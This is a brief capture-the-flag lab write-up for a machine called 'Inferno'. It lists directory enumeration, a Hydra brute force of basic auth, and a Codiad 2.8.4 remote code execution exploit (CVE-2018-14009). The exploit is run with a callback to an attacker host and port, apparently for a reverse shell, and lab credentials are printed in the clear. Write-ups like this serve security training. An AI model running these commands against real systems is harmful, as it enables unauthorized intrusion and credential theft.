Inferno

// gobuster scan reveals /inferno directory
gobuster dir -u http://192.168.1.63/ -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt -x conf,inc,zip,gz

it's using basic auth so decide to use hydra to brute force it 
reveals admin, dante1

【CVE-2018-14009】 Codiad (2.8.4) RCE on Linux machine
https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit

had some issues with it being written in python2 but managed to run it in python3
note to use:
python3 codiad.py http://admin:dante1@192.168.1.63/inferno/ admin dante1 192.168.1.131 4444 linux

view files in /home/dante
cat .download.dat 

// convert Hex to reveal the message (which also contains the pass for dante)
cat .download.dat | xxd -r -p && echo ''

dante:V1rg1l10h3lpm3

PreviousSymfonos2 NextTHM

Last updated 2 years ago

Was this helpful?